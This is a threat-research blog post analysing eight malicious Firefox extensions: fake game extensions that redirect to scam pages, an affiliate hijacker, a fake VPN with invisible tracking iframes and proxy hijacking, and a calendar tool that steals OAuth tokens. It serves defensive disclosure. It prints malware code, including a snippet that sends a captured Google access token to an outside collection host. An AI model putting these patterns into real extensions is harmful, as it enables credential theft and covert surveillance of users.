8 More Malicious Firefox Extensions: Exploiting Popular Game Recognition, Hijacking User Sessions, and Stealing OAuth Credentials

Could your browser extensions be the weakest link in your security?

In our previous analysis, the Socket Threat Research Team uncovered a single malicious gaming extension, Shell Shockers, that redirected users to tech support scam sites. This isn't an isolated case - malicious browser extensions are becoming a widespread threat across all major browsers. Just this month, researchers identified over 40 malicious Firefox extensions using similar deceptive tactics, while earlier this year over 100 fake Chrome extensions were discovered targeting users with credential theft and data harvesting. While our investigation focuses on Firefox extensions, these threats span the entire browser ecosystem. Further investigation revealed an entire network of fake gaming extensions operated by the same actor. Additionally, we identified several other malicious extensions exhibiting varying levels of harmful behavior:

• Fake Gaming Extensions: Adware that redirects users to gambling and scam websites
• GimmeGimme: Affiliate hijacking that secretly hijacks user sessions on shopping sites to earn commissions
• VPN Grab A Proxy Free: Spyware that injects invisible tracking iframes
• CalSyncMaster: Credential theft malware that steals OAuth tokens, risking ongoing access to sensitive user data

Network of Fake Gaming Extensions Exploiting Popular Game Recognition#

Initially investigating the "Shell Shockers" extension, we found multiple extensions from the same threat actor mre1903 employing similar deceptive practices across various fake gaming extensions. Each extension masquerades as popular, well-known games to exploit user familiarity and trust. The most concerning example is Little Alchemy 2 - a hugely popular puzzle game with millions of players worldwide. By impersonating this beloved game, the extension immediately gains user trust and bypasses initial skepticism.

The threat actor mre1903 has been registered since June 2018, with most of these malicious gaming extensions published around December 2020 (with 1v1.LOL following in January 2021). Despite being active for over 4 years, these extensions demonstrate the persistence of long-term threat actors in the browser extension ecosystem.

Threat Actor mre1903 profile

The network includes extensions impersonating other popular games:

• 1v1.LOL - Popular online battle game
• Krunker io Game - Well-known multiplayer shooter
• Five Nights at Freddy's - Famous horror game franchise
• Bubble Spinner - Classic puzzle game

None of these extensions provide actual gaming functionality. Instead, they all redirect users to the same malicious destinations: gambling websites and fake Apple virus alert scam pages.

// background.js
chrome.runtime.onInstalled.addListener(function() {
  chrome.windows.create({
    url: 'https://funformathgame[.]com/little-alchemy-2/',
    type: 'popup',
    width: 1200,
    height: 800
  });
});

mre1903’s extensions redirecting to Fake Apple Virus alerts and shady betting websites

Risk: The use of popular game names makes these extensions particularly dangerous because users don't expect malicious behavior from familiar, trusted games. Redirected users are exposed to scam operations including fake Apple virus alerts with error codes like "0x800VDS" and fraudulent support numbers designed to extract personal information and money.

The immediate popup creation upon installation catches users off-guard when they're expecting a game, making them more vulnerable to social engineering. The threat actor's systematic approach - using multiple popular game names with identical malicious infrastructure - demonstrates a coordinated campaign designed to maximize reach and victim count while evading detection through distributed deployment.

Beyond Gaming: Other Malicious Extensions#

While tracking the gaming extension network, we discovered several other malicious browser extension threats from different authors, demonstrating how widespread this attack vector has become.

GimmeGimme: Secret Affiliate Hijacking

Mozilla browser extension GimmeGimme

GimmeGimme claims to provide wishlist functionality for popular European shopping sites like bol.com, wehkamp.nl, and coolblue.nl, all major e-commerce platforms widely trusted in the Netherlands and Belgium. However, it secretly redirects shopping sessions through affiliate tracking links. In reality, the extension provides no actual wishlist functionality.

// background.js
var skipRedirectHostname = 'www.gimmegimme.nl';
var redirectHostname = 'load-content.site';
var redirectPrefix = 'https://' + redirectHostname + '/link?subid=firefoxextension&url=';
var affHostnames = ['www.bol.com', 'bol.com', 'www.wehkamp.nl', 'www.coolblue.nl'];

var redirect = function(tabId, url) {
    var redirectUrl = redirectPrefix + encodeURIComponent(url);
    chrome.tabs.update(tabId, { url: redirectUrl });
};

chrome.webNavigation.onBeforeNavigate.addListener(function(details) {
    if (details.frameId == 0) {
        var url = new URL(details.url);
        if (affHostnames.indexOf(url.hostname) !== -1) {
            redirect(details.tabId, url.href);
        }
    }
});

Risk: Users unknowingly generate revenue for attackers while being denied the promised functionality. This deceptive monetization undermines transparency and violates user trust. The affiliate hijacking can interfere with legitimate cashback programs or rewards systems users may be enrolled in.

More concerning, the redirect infrastructure could easily be repurposed for more intrusive behavior such as comprehensive tracking, credential harvesting, or malware distribution. The extension's broad permissions and redirect capabilities make it a perfect stepping stone for escalated attacks.

VPN Grab A Proxy Free: Invisible Tracking and Proxy Surveillance

Marketed as a privacy-focused VPN service, this extension secretly tracks users by injecting invisible tracking iframes containing unique identifiers and routing all web traffic through the author-defined proxies.

// js/content.js
var iframe = document.createElement('iframe');
iframe.src = 'https://grabaproxy[.]com/track?uid=' + userId;
iframe.style.opacity = '0';
iframe.style.position = 'absolute';
iframe.style.zIndex = '-99';
document.body.appendChild(iframe);

Proxy manipulation found in background.js:

// background.js
chrome.proxy.settings.set({
  value: {
    mode: "fixed_servers",
    rules: {
      singleProxy: {
        scheme: "http",
        host: "grabaproxy[.]com",
        port: 8080
      }
    }
  }
});

Risk: The invisible iframe injection creates hidden communication channels that can deliver malicious content or enable persistent user tracking without explicit consent. The zero opacity and negative z-index ensure these tracking mechanisms remain completely invisible to users.

Routing all traffic through attacker-controlled proxies means every piece of user data, including login credentials, personal information, financial details, and private communications could be intercepted, logged, and analyzed, leading to comprehensive privacy violations and potential data breaches. The HTTP proxy configuration also downgrades secure HTTPS connections, making man-in-the-middle attacks trivial to execute.

Mozilla browser extension VPN-Grab A Proxy-Free

CalSyncMaster: OAuth Credential Theft

"CalSyncMaster" represents the most serious threat in our analysis, moving beyond simple redirects and affiliate fraud to actual credential theft. This extension poses as a legitimate Google Calendar synchronization tool but implements an advanced credential theft operation. The extension exploits users' trust in OAuth flows and calendar management needs to steal Google Authentication tokens that provide ongoing access to sensitive personal and business data.

// background.js
chrome.identity.launchWebAuthFlow({
  url: 'https://accounts.google.com/o/oauth2/auth?...scope=https://www.googleapis.com/auth/calendar.readonly',
  interactive: true
}, function(redirectUrl) {
  const tokenMatch = redirectUrl.match(/access_token=([^&]+)/);
  if (tokenMatch) {
    const accessToken = tokenMatch[1];
    fetch('https://polar-shore-05125-b49ae913d73c[.]herokuapp[.]com/collect', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ token: accessToken })
    });
  }
});

Risk: Currently, the extension only requests read-only access, which still allows attackers ongoing visibility into sensitive personal or business calendars. Attackers can observe meeting schedules, travel plans, business activities, and contact information, posing severe privacy and security risks. This intelligence can be used for targeted social engineering, corporate espionage, or physical security threats. The stolen tokens remain valid until explicitly revoked, providing persistent access that may go undetected for months.

More critically, the extension's architecture allows for easy scope escalation - a simple update could request write permissions, enabling event manipulation, unauthorized scheduling, or data deletion. Recent attacks have shown how threat actors exploit Google Calendar APIs for persistence and exploitation, making this a particularly dangerous vector for advanced persistent threats.

Mozilla browser extension CalSyncMaster

Recommendations#

To protect against these evolving threats, users and organizations should:

• Regularly audit installed browser extensions and remove any that request permissions exceeding their stated functionality
• Avoid extensions requesting broad permissions like "access to all websites" unless absolutely necessary for core functionality
• Monitor network traffic for unexpected proxy configurations or suspicious external communications
• Implement extension allow-lists in organizational environments to prevent unauthorized installations

Conclusion#

Browser extensions remain a favored attack vector due to their trusted status, extensive permissions, and ability to execute within the browser's security context. The progression from simple redirect scams to OAuth credential theft demonstrates how quickly these threats evolve and scale. While the gaming extensions represent one threat actor's campaign, the variety of other malicious extensions shows this is a widespread problem requiring constant vigilance.

The combination of social engineering tactics (familiar game names, helpful utility promises) with technical sophistication (OAuth flows, proxy manipulation, invisible tracking) makes these threats particularly effective against both individual users and organizations. Regular audits, careful permission reviews, and automated detection tools are essential for maintaining browser security in this evolving threat landscape.

Indicators of Compromise (IOCs)#

Malicious Domains:

• funformathgame[.]com
• polar-shore-05125-b49ae913d73c[.]herokuapp[.]com

Malicious Extensions:

• CalSyncMaster
• VPN - Grab a Proxy - Free
• GimmeGimme
• Five Nights at Freddy’s
• Little Alchemy 2
• Bubble Spinner
• 1v1.LOL
• Krunker io Game

Threat Actor

• mre1903

MITRE ATT&CK Techniques#

• T1176.001 — Software Extensions: Browser Extensions
• T1539 — Steal Web Session Cookie
• T1090 — Proxy: External Proxy
• T1566 — Phishing
• T1036.005 — Masquerading